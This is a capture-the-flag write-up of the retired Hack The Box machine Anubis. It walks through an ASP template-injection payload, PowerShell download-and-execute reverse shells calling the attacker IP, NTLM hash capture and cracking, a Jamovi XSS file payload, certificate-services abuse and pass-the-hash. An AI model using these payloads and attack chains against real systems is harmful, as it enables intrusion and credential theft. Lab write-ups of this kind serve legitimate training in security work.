This is the write-up for the box Anubis that got retired at the 29th January 2022. My IP address was 10.10.14.3 while I did this.
Let's put this in our hosts file:
10.10.11.102 anubis.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/anubis.nmap 10.10.11.102
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-12-24T15:52:24+00:00; +1h00m01s from scanner time.
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Not valid before: 2021-05-24T19:44:56
|_Not valid after: 2031-05-24T19:54:56
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The TLS certificate contains a hostname www.windcorp.htb that has to be added to our /etc/hosts file to access it. The website on the hostname looks like a custom developed company website and has potential usernames:
- Walter White (Chief Executive Officer)
- Sarah Jhonson (Product Manager)
- William Anderson (CTO)
- Amanda Jepson (Accountant)
On the bottom of the page is a contact form and Cross Site Scripting (XSS) can be tested there:
Name: Test1
E-mail: [email protected]
Subject: Test 1
Message: <script src="https://10.10.14.3/test.js"></script>
After sending the request, it forwards to preview.asp and our listener on port 443 receives a response, so there is a vulnerability in this form.
We can test for Server Side Template Injection (SSTI) by using the polyglot payload from PayloadsAllTheThings in the message field. After removing one symbol at a time, it does error until "${{<", which means that the percent symbol (%) is responsible for the error.
These symbols can be used in ASP to test code execution:
<%= 7*7 %>
In the preview.asp it shows the message as 49, which means that it was calculated and there is a way to execute code:
Message: 49
Testing payload to execute whoami
:
<%= CreateObject("Wscript.Shell").exec("whoami").StdOut.ReadAll() %>
Message: nt authority\system
I will use the Invoke-PowerShellTcpOneLine.ps1 script from the Nishang framework as the reverse shell command. Downloading and executing the PowerShell script to gain a reverse shell:
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http:https://10.10.14.3/shell.ps1')").StdOut.ReadAll() %>
After sending the request, it will download and execute the script and the listener on my IP and port 9001 starts a shell as the SYSTEM user on the hostname webserver01. This does not seem to be the target box, but instead a virtualized client or some kind of container.
In the desktop folder of the Administrator user is a file called req.txt, which is a TLS Certificate.
Copying and reading certificate with openssl
:
openssl req -in req.txt -noout -text
The certificate has another hostname softwareportal.windcorp.htb that has to be added to our /etc/hosts file. This hostname is used on another service, so Chisel can be used to create a tunnel from the machine to our client to enumerate ports and other IPs.
Uploading chisel.exe to the box:
curl 10.10.14.3/chisel.exe -o chisel.exe
Starting Chisel server on our client:
./chisel server --socks5 --reverse -p 8000
Connecting to the Chisel server from the box:
.\chisel.exe client 10.10.14.3:8000 R:socks
The subnet is big and scanning could take long, but the default gateway can be scanned for some known ports:
IPv4 Address. . . . . . . . . . . : 172.20.180.149
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 172.20.176.1
Port scanning default gateway:
proxychains nmap -sT -Pn -n -p 80,443 172.20.176.1
PORT STATE SERVICE
80/tcp open http
443/tcp closed https
Adding hostname with the IP to our /etc/hosts file to access it on a browser:
172.20.176.1 softwareportal.windcorp.htb
After configuring the proxy in the browser accordingly, it is possible to access the web service on port 80.
The website has a list of known software packages and according to the URL, they are loaded from the IP of webserver01:
http:https://softwareportal.windcorp.htb/install.asp?client=172.20.180.149&software=7z1900-x64.exe
When changing the client parameter to our client and sniffing the network packets with Wireshark, then we observe that it tries to connect to port 5985. This port is used for WinRM and a listener with Responder can be started to intercept the authentication hash:
responder -I tun0
Changing client parameter to our IP and sending the request:
http:https://softwareportal.windcorp.htb/install.asp?client=10.10.14.3&software=jamovi-1.6.16.0-win64.exe
The NetNTLMv2 of the user localadmin is intercepted:
[WinRM] NTLMv2 Client : 10.10.11.102
[WinRM] NTLMv2 Username : windcorp\localadmin
[WinRM] NTLMv2 Hash : localadmin::windcorp:89cd95c4837c8e29:10E5D931BD8899E673F9642DC3B2(...)
Trying to crack the hash with Hashcat:
hashcat -m 5600 anubis_localadmin.hash /usr/share/wordlists/rockyou.txt
Secret123
After a while it gets cracked and the password can be verified by accessing the SMB shares with CrackMapExec:
crackmapexec smb 10.10.11.102 -u localadmin -p Secret123 --shares
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
CertEnroll READ Active Directory Certificate Services share
IPC$ READ Remote IPC
NETLOGON READ Logon server share
Shared READ
SYSVOL READ Logon server share
The SMB share Shared is a non-default share, so it should be enumerated:
smbclient -U localadmin //10.10.11.102/Shared
There are two folders:
-
Documents
- Big 5.omv
- Bugs.omv
- Tooth Growth.omv
- Whatif.omv
-
Software
- 7z1900-x64.exe
- jamovi-1.6.16.0-win64.exe
- VNC-Viewer-6.20.529-Windows.exe
The folder Documents has OMV files, which is the file extension that Jamovi uses. There is a Cross-Site Scripting (XSS) vulnerability CVE-2021-28079 in the software Jamovi in version 1.6.18 and below.
Downloading Whatif.omv to use it as a template for our exploit:
smb: \Documents\Analytics\> get Whatif.omv
Extracting the file:
unzip Whatif.omv
Adding XSS payload to a column name:
(...)
"name": "a<script src='http:https://10.10.14.3/payload.js'></script>",
"id": 1,
"columnType": "Data",
"dataType": "Decimal",
(...)
Creating OMV file with zip
and naming it Whatif.omv:
zip -r Whatif.omv *
Creating payload.js to execute command:
<script>
require('child_process').exec("powershell IEX((New-Object Net.WebClient).downloadString('http:https://10.10.14.3/shell.ps1'))")
</script>
Uploading modified Whatif.omv to the SMB share:
smb: \Documents\Analytics\> put Whatif.omv
After a while, the new Whatif.omv gets processed and runs the JavaScript payload, which executes shell.ps1 so the listener on my IP and port 9001 starts a shell as the user diegocruz.
In the SMB shares, there is a share CertEnroll which exists only when Active Directory Certificate Services are enabled. To abuse this service, the Certified Pre-Owned vulnerabilities will be used.
Tools needed for exploitation:
$TargetUPN = $user.samaccountname
Executing Certify to find vulnerable certificates:
Certify.exe find /vulnerable /currentuser
The template Web is vulnerable, so running the Get-SmartCardCertificate command from ADCS.ps1 to create SmartCard Certificate:
Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard
Confirming that a certificate was created:
gci cert:\currentuser\my -recurse
Executing Rubeus to get the hash of Administrator by authenticating with the certificate:
Rubeus.exe asktgt /user:Administrator /certificate:E5EF6773C206F55C4DDAEE3C222AC729005075A4 /getcredentials
Using impacket-psexec to authenticate to the box with the hash:
impacket-psexec -hashes 3CCC18280610C6CA3156F995B5899E09:3CCC18280610C6CA3156F995B5899E09 [email protected]
The hash is accepted and starts a shell as the SYSTEM user!